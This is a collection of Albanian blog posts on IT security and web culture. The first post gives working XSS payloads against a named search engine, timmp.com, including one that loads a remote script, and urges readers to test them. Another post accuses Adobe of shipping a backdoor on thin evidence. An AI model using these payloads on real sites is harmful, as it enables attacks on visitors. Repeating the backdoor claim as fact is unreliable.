Timmp.com – Motorri i ri i kerkimit (IT’S HACKED UP)

Emmmmm , eshte pak jo e hijshme qe te flas per kete, porse gjithsesi po shkruaj disa gjera…
Me vjen keq qe me bie perhere mua te flas per problemet :(

Ky eshte nje motorr kerkimi i krijuar nga nje shqiptar, dhe kur e mora vesh lajmin u gezova shume, edhe pse ka me shume rezultate se google ,  pra eshte pune goxha serioze dhe eshte krenari per ne qe te bejm gjera te tilla, dhe nga ana tjeter uroj qe te kete sa me shume shqiptar te tille. Rastesisht duke povuar disa terma kerkimi hasa ne nje gabim:

http://www.timmp.com/index.php/search/q/all/el8

Siç e shohim motorri eshte i ndertuar ne php, dhe kjo me beri te mendoja per vulns,
Nuk duhet shume per te arritur ne rendimin e serverit dhe problemeve te tij,

http://www.timmp.com/index.php/search/q/all/%3cimg+src%3d%22jav%26%23×09%3bascript%3aalert(‘ALERT’)%3b%22%3e

Dikush qe une nuk e di sepse u mora me kete pune vetem 5 min, ke perfituar nga ky vulnerabilitet dhe ka hackuar faqen duke arritur te modifikoj edhe query.t e kerkimit.
Per konfirmim, shkoni tek http://www.timmp.com dhe kerkoni me kete kriter kerkimi:

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

Mesazhet qe paraqiten nuk jane shokuese, dikush duhet te mendonte para edhe per sigurine e faqes, faqa ne kete moment eshte e penetruar dhe me sa duket askush nuk eshte shqetesuar.
Te jesh konkurrent sot ne tregun e eger IT, do te thote qe duhet te presesh edhe sulme, qofte edhe nga administratoret e google, kujt do ti pelqente ti iknin miliona vetem se nje 20 vjeçar shkruan nje motorr kerkimi me me shume rezultate se sa vet gogòli?
Ju bej thirrje lexuesve qe te reportojn tek administratori i faqes keto probleme, tek faqa mund te egzekutohen edhe skripte te jashtme qe ndodhen ne faqe te huaja, psh <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> po ta provoni skripti do te egzekutohet ne faqe.
Te gjithe duhet ti çojm email dhe linkoni postimin ne menyre qe te kete me shume sqarime, dhe te besoj vertet qe faqa nuk eshte me e tij.

Tung tung ..

Paradoks ne Universitetet Shqiptare

Mund te thoni se me pelqen kritika, porse nuk eshte e vertet.
Me pelqen te them fjale te mira , te lavderoj por jo pa vend.
E pra kete teme po ja dedikojme pedagogeve tane te dashur (nese jane te tille).
E nga tja nisim :/ , eshte fjala per fakultetet e informatikes , per te tjerat qe nuk kam njohuri nuk mund te flas.
Shumica e atyre qe pergatisin sot “eliten” shqiptare te informatikes, inxhinieret e ardhshem ,
Specialistet e Sigurise, Programatoret, Administratoret,
Specialistet e rrjetit sistemeve operative etj …etj ..nuk kane mbaruar vet per Informatike!
SI?
Po po, nuk kane mbaruar as per informatike te pergjithshme te harrojm specializimet\masterat etj,
por kane mbaruar per Fizik ose Matematik!
A mund te me thoni se ç’lidhje ka pitagora me kriptografine rijndael?
A mund te me thoni se ç’lidhje ka Isak Newtoni me nje Stack Overflow apo
me nje proçesor qe ka arritur 100%?
Dhe gjithsesi mbeten PEDAGOGE apo jo?
Pedagoge vertet mbeten, por jo Informatike ama!
Nuk dua ti heq asnjerit meritat, mund te kene metode te shkelqyer mesimdhenie,
mund te jene shkenctaret e matematikes apo fizikes, por me Informatiken jane amator dhe
jo te Diplomuar, nese jane profesionist ku e kane diplomen?
Une kete teme po e shkruaj si i jashtem, pasi personalisht nuk kam studjuar ne shqiperi porse
shume te njohur me kane sinjalizuar per situaten aty, dhe e keqa eshte se
nga mosha qe kane nuk çohen dot as nga karrigja tju hapin vendin te rinjve (pleqeri hesapi)
qe me siguri jane shume here me lart se ata.
Gjendja eshte e deshperuar, shumica e studenteve edhe pse mbarojn
“per informatik” nuk dine te shkruajn nje program, nuk dine te ndertojn nje faqe te thjeshte ne html,
nuk dine te menaxhojn nje databaze e nuk dine se ç’fare eshte LINUX..
Me duket se u bene si  shume “nuk dine” …, e kur “nuk dine” atehere si i marrin keto provime?
Pergjigjen te dashur miq po ua leme atyre qe luftojn korrupsionin dhe pedagogeve qe perhapin kulturen
, kulture qe u shpalos ne menyre perfekte nga ish ministri i kultures-rinis-dhe sekseve.

Jam shume i hidheruar per te vazhduar akoma me temen, e ne te njejten kohe u them
KURAJO te gjithe atyre pedagogeve qe kane diplome informatike
dhe jane te specializuar per ate vend pune, gjithashtu dhe studenteve nje KURAJO e madhe!
Zgjohuni, jemi ne 2o1o nuk jemi ne kohen kur u hap normalja ne Elbasan.

Adobe Systems Incorporated © na shet viruse ;)

Pershendetje….
Tema eshte pak e hidhur, dhe goxha serioze. Si introduksion po e nis me diçka goxha misterioze qe me pati ndodhur vite me pare… Ka qene dhe nje nga faktoret qe ndikuan qe te kaloja ne linux.
Mbasi mbarova formatimin e kompiuterit tim , instalova windows dhe drejtpersedrejti driverat e sistemit.
Mbas kesaj, ende pa e lidhur me internetin dhe pa i futur ndonje flash apo hardisk te jashtem i bera nje skanim me Norton ( kete perdorja atehere :S ), dhe ç’te shoh, njeri nga driverat qe kisha instaluar permbante viruse.
Akoma me interesante ishte se ne C:\windows\ ishte krijuar nje direktori qe nuk e kisha pare ndonjehere ne sistemet e tjera, hyra ne te dhe nder te tjerash gjeta:
Aplikacione gjysem te koduara, winrar me krak te gatshem dhe serial, nje aplikacion ku dilte fotoja e nje kinezi me syze e te gjitha keto ne nje kompiuter te “virgjer” te sapoformatuar..
Mbas kesaj eksperience te çuditshme, dhe nje lajmi tjeter ne Indonezi ku Maxtor shiste hardisqe (500G) me trojane brenda mu be e qarte qe keto firma kerkojn te na kene nen kontroll dhe se informacioni realisht eshte Fuqi.

Le te kalojm tek tema e dites, vendosa te shkarkoja versionin trial te Adobe Creative Suite Master Collection 4 per ta provuar ne kompiuterin personal, dhe shkarkimi funksionon zakonisht ne kete lloj frome. Ti shkarkon nje aplikacion nga akamai.com (me redirect nga adobe) dhe quhet AdobeDownloadManagerInstaller.exe dhe me ane te ketij pastaj shkarkon programin qe te nevoitet ne kete rast Creative Suite Master Collection.
Ja se ç’fare ndodhi:

Si fillim , per egzekutim aplikacioni kerkoi privilegjet e administratorit gje qe nuk me pelqeu per nje download manager, e dyta duke pasur comodo internet security te instaluar ne kompiuter kontrolloja levizjet dhe gjerat e para qe bere ishte te modifikonte \\HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\ dhe ti jepte vetes privilegje te “papame” sepse startonte automatikisht me sistemin, etj etj etj keshtu qe me terhoqi vemendjen, dhe ja :) :
Faza 1 e backdoorit
Pjesa 2 – eshte duke u lidhur dhe duke shkarkuar backdoor-in dhe “programin e shkarkimit” nderkohe qe modifikon regjistrat e sistemit.

Adobe shet backdoors

Pjesa 3 – Rastesisht kapet nga Comodo Internet Security, kjo sepse adobe nuk ka shkruajtes viruesesh te mire.

Comodo Internet Security kap Backdoorin

Pse?
Sepse kane marre nje Win32.PcClient dhe e kane modifikuar paksa nderkohe qe mund te benin diçka si miqte e tyre (dmth te kodonin diçka vet, ku hashi te mos jete neper db antivirusesh).

E instalova ne kompiuter sepse isha kurioz te shikoja funksionet dhe e dergova per analiz dhe tek virus total, i vetmi qe e kapte ishte comodo, pra mos ti shajm shume se dhe aq keq nuk kane punuar.

Me shume info:
Gjate instalimit programi perdor service.exe per te pasur kontroll te plote mbi sistemin, rast ky shume i zakonshem tek trojanet.
Per ata qe e kane instaluar mund ta gjejn tek C:\Program Files\Common Files\Akamai\rswin_3629.dll
Shkarkoni Comodo Internet Security, dhe instaloni AkamaiDownloadManager dhe shikoni levizjet qe ben ne regjistrin e sistemit.
Provoni ta fshini 😀 (eshte e pamundur) duhet te çinstaloni programin ose te hyni me live cd linux dhe ta fshini nderkohe qe windows eshte fikur. Kjo eshte mbrojtja tipike e nje backdoori.
Modifikimet qe behen ne regjister jane:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\DisplayName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Akamai\Description
Si dhe ne nendirektorin parameters.
Ja dhe 2 foto:
Regjistri i infektuar

Backdoori (tek regjistri)

Zgjidhja

Shkoni tek : www.kernel.org
Shkarkoni kernelin e fundit, lexoni kodin (i gjith sistemi ne doren tuaj)
Kompiloni duke selektuar vetem hardwarin e kompiuterit.
Enjoy YOUR systM

Nese vazhdoni te perdorni winXozz, atehere shkoni tek direktoira \Akamai, çinstaloni panvarsisht se kjo nuk kam frike se nuk e ndryshone shume gjendjen.
Pastaj >Start>Run>regedit
Dhe do hapet registry editor, shkoni tek HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ dhe fshini direktorin Akamai, kjo do u lejoj me vone qe te fshini edhe ato qe nuk jane fshire tek C:\Program Files\Common Files\Akamai\*

Industria Hacker (fjala per white-hats & sKiddie)

Ne cilen epok jetojm?
Ne ate qe quhet ‘materializem’ dhe si ç’do fushe tjeter edhe kjo , goxha abstrakte dhe filozofike ka kaluar ne Materializem, dhe gjerat shikohen vetem ne baze te profitit.
Tema eshte shume delikate, keshtu qe perpiquni ti shikoni gjerat nga kenveshtrime te ndryshme, nese ndonje black-hat eshte duke lexuar i them qe nuk jemi ne kohen e Legion of Doom,  John Draper, phc, ~el8, etj  e duke u ngjitur deri tek ato qe kane ngelur sot, whitehatsave qe besoj se jane shumica u them gjithashtu qe te lexojn me vemendje pasi kjo eshte drejtuar juve,  persa i perket script kiddiez, mendimin mbi ta e kam paraqitur edhe ne shume postime te tjera.
Dizinformimi, ashtu si ne fushat e tjera ka arritur dhe ne kete fushe.
Jo pa qellim e titullova Industria Hacker sepse ne kurriz te shume white-hats ndertohen bizneset e tyre, dhe ne saje te skript kiddieve industria e security do te gjej gjithmon klient.
Te gjith ata qe ja kane pak idene, gjeja e pare qe jane nisur `per tu bere hacker` ka qene ‘si ti futem tjetrit ne kompiuter’ apo jo?
Shumica e webeve, pa perjashtuar edhe ato qe e mbajn veten si black-hats pasi perkufizimi qe i eshte dhene whitehat eshte teresisht i gabuar (keshtu qe mos kujtoni se jeni  blackhat nese postoni exploitin per te shit pordh), e kjo kap kulmin kur Kevin mitnick quhet black-hat, e gjith kjo shkakton goxha konfuzion apo jo?

Po standartiozojm pak gjendjen.
A) Security Industry — te gjitha ato firmat e medha security qe ushqehen me source kode te koduara falas nga hackera ne mbare boten, shitjen e tyre tek klientet e tyre .
B) Hacking Scene — te pakten ajo qe quhet sot me `skena hacking` eshte ndertuar ne menyre te perkryer nga keta kolos te industris duke u vene modele perpara te gjitheve,  dhe te gjith thyhen ne dysh per te pasur emrin e tyre tek securityfocus, firsirt, milp0rn, mitre,etj etj .
C) WhiteHat — jam i detyruar te perdor te njejtin perkufizim te PHC, edhe pse  kane ndryshuar shume gjera qe atehere dhe spo merret me vesh who is who, Ata qe ndihmojn industrin security duke postuar bug-e\exploits\teknika sulmi etj.
D) Script Kiddiez — Nje perkufizim eshte `ata qe nuk lexojn kod` , por ne kete teme o u themi ata qe plotesojn pikturen e te gjith kesaj..

Shumica prej jush e kane nisur me `dua te hyj ne nje kompiuter` dhe sa keni perfunduar ne forumin e pare ~`hax0r` qe u binte dhe benit pyetje te tilla u hakerreheshin me ‘neewbieeee’ – ‘lamerrr’ – ‘script kiddieeee’  e te tjera si keto, dhe mesoheshit qe ajo eshte keq dhe mire eshte qe ti te zbulosh nje bug\exploit dhe ta  postosh tek milw0rm, securityfocus, etj ne menyre qe te jesh “hacker” e dikush me rendesi, e ne fund te exploitit shkruaje ‘faleminderit filanit, filanit, filanit’ autori, data e te tjera si keto.
Shume shpejt , max 2 vite do e lije dhe kete pune pasi nuk ke me entuziazem, ti shpenzon ore te tera, studime, analizim kodi dhe ske asnje perfitim perveç se te kesh hapur nje irc, \website\ ku te tjeret vijn e te bejn qejfin per 2 copa kodi dhe ti e di mire kete!

PRAPASKENA

Kodi qe ti je lodhur aq shum, exploiti qe e ke nxjerr me aq shume mund , merret nga  koloset e kompanis, modifikohet pakz (ose edhe ashtu shqeto) , integrohet me ndonje program sigurie qe shitet me 500€  1 liçenc e vetme, 😉
Per kete argument eshte edhe ezine e publikuar 1 teme me pare ketu ne albanianwizard.org, shiko se si Dan  kerkon ndihme me emaile kontakteve te tij per te zbuluar `exploitin e tij te famshem mbi DNS-t` te cilin e njohin te gjith ata qe ndoqen Defcon-in e fundit.
E te tjeret normalisht behen copash per te koduar per te, sepse ai eshte ‘hackeri’ a kupto!?

Po Script Kiddiez ku hyn ne kete muabet?
Ata, heh, kush nuk di te marri nje kod gati nga sitet e mesiperme e te filloj me nje dork te qelloj 20 faqet e rradhes te gjetura ne google?
Keshtu qe ata jane horrori i vertet, sepse terrorizojn publikun injorant se jane hackera, jane te keqinj, grrrrrr, dhe keta shkojn te marrin ndonje ‘specialist sigurie’ nga keto firmat qe folem per te ~`siguruar biznesin`~  e tyre.

Ja nje tablo :)
Inustria Hacker
Zgjidhja?

Une jam me black-hat deri diku, dhe me white-hat deri diku , une them nese do te behesh analist, mos e publiko kodin tend, mbaje ne menyre qe ta shesesh neser, per mua websitet si milw0rm, securityfocus, etj jane webe qe nuk duhet te egzistojn, eshte nje lloj sikur te mbash depot e 97 hapur, kujton se njerezit nuk do sulmojn me ato arm?
Sigurisht qe do te sulmojn dhe do te demtojn, por nga ana tjeter egziston pyetja, si do te eci siguria perpara kur une mbaj kodet e mia private?
Per fat te mire, secili eshte i specializuar ne nje fush, psh njeri ne exploite BOF, tjetri ne heap overflow, tjetri ne remote exploit, tjetri ne local exploit, njeri ne vulnerabilitete web, tjetri di LKM-t, e keshtu me rradhe, keshtu qe per analizen qe ben ja vlen dhe te paguehesh dhe jo te marri tjetri leket ne kurrizin tend.
Pikerisht white-hatsat te rene pre e kesaj politike dhe duke degjuar teorit qe bejn lavazhe te trurit perdit, broçkullat `etike` e meqe ra fjala:
Cili nga ata qe ka publikuar exploit dhe e mban veten si njeri me etik qe ruan `privacy` e te tjera si keto nuk ka penetruar ndonjehere ne ndonje vend qe nuk duhet te ishte?
Ndryshe si ka mesuar qe exploiti i tij punon apo jo?
Hajde, nuk i ha njeri ato.
Me siguri eshte nje teme qe ka nevoje per shtjellime dhe normalisht ne munges njohurish tek lexuesit mund te lindin dhe keqkuptime.
Nese ka pyetje te behen ketu.

3l!t3 g0t h4ck3D

E keni degjuar ate shprehjen : “Asgje nuk mund ta ndaloj nje hacker”?

Eshte e vertet!
Perpara se te hyjm ne teme te shpjegojm pa diçka qe e kam thene ketu e 3 vjet ne nje forum underground, e sigurisht miqve te mi qe i pershendes e mbajn mend mire.
Fola per Kevin Mitnick qe nuk eshte Hacker dhe eshte thjesht nje bufon qe e ka vene ‘shteti’ si dordolec per te perhapur dizinformimin tek njerezit, e si ai ka dhe te tjere si shume qe marrin pjese ne Defcon, Dan Kaminsky, rsnake, website si milp0rn me shoket e FBi-s e keshtu me rradhe.
Per ata qe sadopak jane ne brendesi te kesaj, e kuptojn shume mire ate qe kam shkruajtur me siper.
Kev, e ka ngrene edhe nga te tjere, per tu permendur Cyber-T qe ka hequr dhe koka te tjere perfshire irc.milp0rn qe ka qene aktive ne ate kohe, e gjithashtu dhe FBH, e te tjere qe nuk publikojn tek zone-h.
Nese nuk u mbushet mendja dhe jeni shume te mashtruar hidhini nje sy e zgjohuni:
http://www.zone-h.org/archive/ip=65.254.38.202

E Eldo, kisha te drejt xD? sp1d3r.. kisha te drejt?
Them dizinformim, sepse u mbushet mendja edhe atyre qe duan te behen ” HACKERA ”  me pallavra dhe asgje me shume, per tani eshte teme goxha e gjate per tu trajtuar, gjithsesi gjat leximit te kesaj e-zine qe ka publikuar autori i cili ka penetruar websitet e me poshtme:
mitnicksecurity.com (Kevin Mitnick)
0×000000.com (Ronald van den Heetkamp)
doxpara.com (Dan Kaminsky)
perlmonks.org (Perl Monks)
elitehackers.com/info (EliteHackers)
binrev.com (Binary revolution)
invisiblethingslab.com (Joanna Rutkowska)

Te gjithe keto shume te njohur si “hackera” apo gaboj?
Do thoni ju, ne baze te ligjit me siper i bie qe ç’do hacker mund te hakohet nga nje hacker tjeter, e vertet ashtu eshte, askush nuk eshte 100% i mbrojtur por ketu nuk eshte fjala per kete, ketu eshte fjala per dizinformimin qe kane perhapur keta persona me librat\videot\konferencat e tyre.

Po u le ne shoqerine e ketij e-zini shume te mire :)
http://albanianwizard.org/3z1n3s/zf05.txt

Lexim te kendshem !!
Ps, te rinjve shqiptar qe duan te merren me keto pune, realisht nje H te vertet e dalloni sepse:
A) Nuk njihet dhe askush nuk ka degjuar per te.
B) Websaiti i tij vizitohet nga nje numer i limituar personash
C) Nuk mburret dhe nuk tregon per aftesit e tij (eshte ne kundershtim me karakterin) dhe jane shume realist
Mesazhi perfundimtar, nese nuk ploteson keto kushtet qe citova ketu, dije se nuk je ne underground dhe undergroundi nuk eshte ai qe kujton ti 😉

1 Shqiptar = 1 Web ==> “Webmasterizimi” i kalamajve Shqiptar

Ja ku po kthehemi ne realitetin e hidhur shqiptar..

Sot isha duke vizituar edhe njehere webet shqiptare, (shpresoj per here te fundit) te gjithe nga pak, mos tu ngeli hatri. Me ndodhi qe njerit ti beja nje pen-testing (lol  1/100 e ecuris normale)  dhe me skanimin e pare doli me mbi 600 blind sql injection vulnerabilitete dhe rreth 400 remote code execution, ky tipi ka server microsock dhe nje sit ne asp, mendova mah duhet te kene ndonje ide se per ç’fare behet fjale dhe mbas emailit (ku u çova raportin e vulnerabiliteteve), as qe ka levizur bishtin per ta ndryshuar, nejse puna e tyre.

Ndersa po vizitoja nje forum, vura re postimet e fundit, dhe fillova te qeshja..  Do te doja shum te mos e beja por ja qe u vu buza ne gaz. Tek “Temat e Reja” te ketij X forumi vura re qe te gjitha postimet qe ishin bere ishin ne seksionin “Faqe Shqiptare” dhe te gjith ata qe postonin benin thjesht rreklam te faqeve te tyre bajate pa pik kuptimi. Ne fillim ka qene ne mod vbulletin, alla tbc-crew me ndonje shqiponje dykrenare dhe me nje LIDHU ME NA!!! qe linkonte ne forum.. U hap nje blog, uuu oburraaaaa te gjith blogjeeeee , kapeni se na iku ah qeniiii….veç po e mori vesh sali protopapa :S

E pse kjo do thoni?, sepse ska ngelur shqiptar pa hapur nje webfaqe personale, sa me hoste me pagese, sa me hoste free, e po behen me shume webe se sa shqiptare, prandaj sa hapet nje web shumica e postimeve jane rreklama te webmasterave te tjere per faqen e tyre, e vetem kur mbushen 2 faqe forum pastaj..

Mendoni se po u sulmoj?, jo nuk eshte ashtu, thjesht po perpiqem tju jap realitetin e asaj qe jeni dhe te ndryshoni drejtim sepse nuk behesh webmaster vetem me njohurit : wordpress (instalimi jo me shum), vbulletin, filezilla, mysql dhe chmod.  Nese do u sulmoja do thoja vbkiddie, kalamawordpress. Ja ndaloni nje moment dhe mendoni, e mbushet faqen plot me muzik, lajme si ( firefox ka publikuar betan, google chrome, vidjoja e javes apo ku ta di une se ç’fare u shkon neper mend), ja edhe moret nje tuf bagetish per vizitor qe nuk u plas shum se si e shpenzojn kohen dhe a kane perfitime nga koha qe jane duke shpenzuar, cili eshte perfitimi i kesaj faqeje? ç’fare u jepni vizitoreve? dhe akoma me mire, CILI ESHTE NDRYSHIMI JUAJ NGA 101 Klonet qe gjenden ne net?

Me kete nuk dua te hedh posht punen e askujt qe perpiqet te japi diçka origjinale, por si keta mund te numurohen me gishta te tjeret jeni mere me lang se mishi u hang thot populli. Mendoni per ato qe jane shkruajtur, dhe mos u tregoni me shqiperine aq te keqinj saç eshte treguar shqiperia me ju, jepini diçka e mos ja merrni edhe ato pak tru qe i kan ngelur. Te sherbesh ka thene dikush eshte Cilesi Hyjnore, kur nuk di ta besh me mire meso e mesimi nuk merret ndryshe vetem se me durim, e nese nuk i ke as keto te dyja hap kraun e mos ngarko internetin kot. Jan ber te gjith kalamajt me webe, e perveç spamit spo shoh gje tjeter verdall.

Ah, gallata me  e madhe ishte kur pash nje tip ne foto qe i kishte nja 13 vjeç, e ishte sikur e kishte peshty lopa dhe thoshte: “firma INC (:L INC HAHAHAH)” sherbime web hosting 100% te sigurta,,..

100% te sigurta?  100% te sigurta? hahahaha, po ç’te presesh tjeter, femij u falet por i ftoj ‘ata qe perpiqen te bejn diçka ne atmosferen e netit shqiptar’ qe ti denoncojn keto fenomene dhe te pastrojn dhe veten e tyre pasi pak jane qe jane komplet te paster nga cilesit e ktyre copy\paste.

PS, ti tipi i firmes INC, sa per info siguria eshte thjesht nje koncept per ti bere njerezit me te sigurt, /fjale, premtime, fushat elektorale, dhe perderisa je ne planetin TOKE nuk eshte asnjehere 100%. Ja, lexo pak me posht dhe do e kuptosh se per ç’fare behet fjale ( gjithmon nese merr vesh se per ç’fare flitet).

Tematika e forumeve shqiptare – Na bashkoi Injoranca

Dihet qe shumica e atyre qe perdorin internetin sot jane te rinjt, dhe si perqindje jane ata qe e perdorin me rregullisht internetin ne krahasim me te tjeret.
Informacionin fillestar e marrin nga faqet qe vizitojn perderisa tashme eshte ber ne mod qe mos te shihet me televizori, dhe nuk para besoj qe ka te rinj qe shohin edicionin informativ te lajmeve tek TVSH xD.
Keshtu qe ja ku jemi, ne te rinjte e ne dore kemi nje browser per te eksporuar ne internet. :(
Problemi kryesor i webmasterave shqiptare sot, eshte se si te kene me shume vizitor ne menyre qe te klikohen me shume ads qe ata te fitojn me shum lek.
E si te ken me shume vizitor?
– Duke i mbushur forumet e tyre me sa me shume postime, qe te terheqin interes tek vizitoret.
Po ç’fare terheq interes tek vizitoret?
– Ah, kjo varet nga niveli intelektual i vizitoreve, nese vizitoret terhiqen nga tralala zura nje gale, edhe temat do jene tralala zura nje gale nese niveli kulturor i vizitoreve do jete me i lart atehere dhe temat do te jene te nje niveli me te lart.  Po perderisa nuk mund te kontrollojm nivelin e vizitoreve, atehere do lem vet vizitoret te zgjedhin se ç’fare te diskutojn apo jo?
Ja nje list titujsh temash te fundit qe mora nga nje forum shum i vizituar:
Ka momente qe..
Une të jap …. po ti çfarë me jep????
Une them qe..
Personi sipër…
Loja filloi. Prisni baluket!
Loje me shkronjen e fundit te fjales..
Si me vjedh 88 pale brek te komshies.
E gjera te tilla… spo e zgjas me i keni shume mire parasysh se i vizitoni perdit.
Rinia qe eshte forca kryesore levizese, apo LEVA e shoqeirse qe diskuton keto tema?
Ku eshte kultura?
Ku eshte intelektualja?
Ku eshte perfitimi?
hah, kjo çon vetem ne nje drejtim, ne obfuskimin mental, i çon te rinjt ne nje stad mendor bageti e buqesi, te vetmet gjera qe mendojn jan, seksi, sporti, ku me pi kafen e mbazdites apo te mengjezit, ke me sha apo me marr ne goje e asnje nga keto nuk u sjell perfitime qofshin keto ekonomike apo psiqike apo shpirterore perkundrazi jane e kunderta.
A, me falni, dikush nga ju lexues te dashur do thote qe ne forum ka dhe tema si Biologjia, apo Lajme, apo Aktualitete shoqërore, apo ku ta di une se ç’fare tjeter, po shikoni njeher se sa aktive jan, dhe per me teper shikoni se ç’fare temash plera paraqiten.
O RINI, ZGJOHU!
MOS E MBUSH MENDJEN ME PLERA, NUK DO TE TE SHERBEJN KURRE PERKUNDRAZI JANE NE DEMIN TEND, DO TE TE KTHEJN NE NJE SKLLAV TE MIREFILLT NESER KUR DO DALESH NE JETE.
O RINI ZGJOHU!
FILLO TE PERDORESH TRURIN QE KE, SHIKO SE ç’FARE FITON E ç’FARE HUMBET.
O RINI, DIKUSH PO TALLET ME TY, E TI RRI EDHE I BUZEQESH.
INJORANCA NA BASHKOI NEPER FORUME, LE TI MBAJM ISO NJERI-TJETRIT TANI.
LE TE ECI PERPARA SHQIPERI ME INJORANC , LE TE ECIM PERPARA, PERAPARANII, KAPINIII,….VRITINI……

Shkarko nga divshare pa pritur

Isha duke bere prova me divshare dhe kuriozia ishte qe mund te kalosh direkt tek faqa e shkarkimit pa klikuar neper ads, apo faqe ridrejtuese dhe pa pritur sekondat.
SI?
Marrim nje link te tipit:
divshare[dot]com/download/6642219-284
Do jemi tek nje faqe e do na hapet nje popup automatikisht. [rreklama]
Mbas kesaj do te ridrejtohemi tek nje faqe tjeter ku do jene sekondat
divshare[dot]com/i/6642219-284
E me ne fund, do te ridrejothemi tek faqa e shkarkimit
divshare[dot]com/download/launch/6642219-284

Po sikur ^?^?

😀   😀   😀
Nese shkojm direkt tek faqa e fundit
divshare[dot]com/download/launch/6642219-284
Do te hapet nje popup, mbylleni dhe shkruajeni dhe njehere linkun dhe downloadi do te filloj ne çast.
Pra
1. Fusni ne web browser
divshare[dot]com/download/launch/6642219-284
Mbas kesaj automatikisht divshare do e modifikoj linkun dhe do e kthej ne:
divshare[dot]com/download/6642219-284
Kurse ne qe e kemi te kopjuar ne te njejtin moment do i bejm perseri paste tek bari i browserit
divshare[dot]com/download/launch/6642219-284

NE perfundim, marrim nje link normal dhe midis download dhe numrave shtojm /launch/ dhe i bejm paste 2 here ne browser (tek bari i adreses) dhe gjithçka mbaroi, shkarkimi duhet te nisi menjehere.

ENJOY 😉

PS- Meqenese kemi te bejm me divshare po e fusim tek kategoria Turpi i Turpeve. [divshare zgjohu, bota perdor linqe te modifikueshme (i brendshmi nga serveri dhe jo external link)]

iPhone 3G, “hacking” apo e drejta per pronen tende?

Turpi i turpeve kesaj rradhe i takon APPLE
Po jetojm kohe te veshtira apo jo :D?

Ja ku po e nisim me te rene e fundit, apo dredhite e apple qe ka bere me prodhimin e saj te quajtur iPhone.
Shume prej nesh mund te paguajm per te blere nje makine, rrob, shtepi apo ku ta di une nje kompiuter etj.
Dhe pak prej nesh jane ne realitet pronar, apo owner te atyre gjerave qe sapo i blem dhe normalisht jane ne pronesine tone..
Pse e them kete..
Marrim rastin e iPhone, meqe po flasim per iphone..
Ne vendet europiane eshte me nje çmim prej 600€ , ne japoni 200 $ ashtu si ne amerik, dhe ja ku e blem iphonin tone, por gjeje pak se ç’fare..
Nuk mund te instalojm programe te cilat nuk jane ne iTuneStore, ne fjale te tjera nuk mund te instalojm programe qe nuk shiten nga APPLE, dhe me kete u siguroj qe APPLE zuri te njejtin vend tek une si MIXROZOFT!
Ne fjale te tjera,
shkojm dhe blejm nje makine tek mercedez, dhe ne te njejten kohe mercedez perveç makinave shet dhe benzin, dhe mbasi e blejm marrim vesh lajmin e hidhur qe duhet te bejm shuuume kilometra, te paguajm me shume leke, dhe te marrim nje benzin skarso vetem e vetem qe mercedezi te vazhdoj te fitoj tek ne.
Pra eshte absurde apo jo?
Gjithsesi ja se ç’fare ndodh.
Programuesit e iphone developer team zhvilluan aplikcione te quajtura quickpwnage dhe pwnage  per te liruar iphone dhe per ta bere ate te afte per te pasur mundesi qe te instaloj aplikacione te tjera qe jane falas dhe shume me te mira se ato qe gjenden tek itunes store..
Por ja qe sfida nuk mbaron me kaq..
Ne firmwarin e ri 2.2.1 ata (te apple) futen nje mekanizem te ri per ta bere jofunksional aplikacionin PwnageTool.
Per fat te mire iphone dev team menjehere si kunderpergjigje nxorri versionin e ri PwnageTool 2.2.5 por imagjinoni pak, apple nuk dorezohet me kaq..
Ajo ne axhornimin e fundit 10.5.6 te sistitemit operativ MacOSX krijoi andrallen e fundit per te shmangur qe njerezit qe I BLEJN DHE I PAGUAJN ME LEK IPHONIN te kene mundesi qe te instalojn ne te ato qe deshirojn ata, pa u limituar nese nje aplikacion eshte ka firmen apple apo jo..
Dhe degjojeni te fundit :)
Gjate hacking te iphone, kur e kemi te lidhur me kompiuterin tone mac, dhe mbarojm komplet etapat per ndryshimin e firemwarit (ne fjale te tjera kjo metode eshte modifikimi i sistemit dhe softwarit hardware te paisjes me nje tjeter e cila te lejon instalimin e aplikacioneve te tjera perveç atyre te apple [do te ishte mire ti skartonin fare xD]) dhe kur hyme ne DFU mode (nje lloj safemode  i sistemit ku zakonisht behet backupi) sistemi yne i dashur me shenjen e molles se kafshuar na thote se iTunes (dhe jo iPhone) nuk eshte njohur ne menyre te sakt si periferike !
Arrini ta besoni?
Por nga ana tjeter dhe ne nuk dorezohemi !
Secili person ka te drejtat e tij, dhe ata mohojn ne menyre konstante te drejten e prones private, dhe blejn gjykatesit e shitur me leket e tyre te qelbura.
JA pra dhe menyra tjeter per te shmangur kete marifet te tyre.
Kjo mosnjohje e iPhonit shkaktohet nga driveri i ri i usb-s qe instalohet automatikisht me MacOSX 10.5.6
😀
Zgjidhja eshte shume e thjesht dhe shume llogjike
Mjafton qe tek usb-ja e mac te fusim nje usb-hub (shperndares usb) dhe tek usb-hub te lidhim kavon usb te iPhonit dhe problemi u zgjidh.
Te gjitha keto mu desh ti beja gjate HACKING dhe fitimit te te drejtave te prones private gjate zhbllokimit te iPhone 3G te vellait tim me firmware 2.2.1 ne MacOsX 10.5.6
Per te gjithe te interesuarit per guid se si te zhbllokohet iPhone mjafton te kerkoni ne internet, dhe te kerkoni me “jailbreaking iPhone 3G” dhe keni tutoriale te ilustruara shume qart.
Per arsyen se ka pikerisht shume te tille dhe jane shume te qarte, u ndala te sqaroja vetem kete metode speciale per te zhbllokuar versionin e fundit te iPhone me versionin e fundit te firmware ne versionin e fundit te MacOsX,  metod te cilen e keni shume te nevojshme nese keni te beni me versionet  e fundit pra nese nuk perdorni usb-hub ato qe jane ilustruar ne tutorialet e gjetura ne internet nuk do te funsionojn.
Ah, arsyeja tjeter pse nuk solla ketu ato tutoriale eshte se pastaj thone qe “perkthej” dhe temat nuk jane te miat.
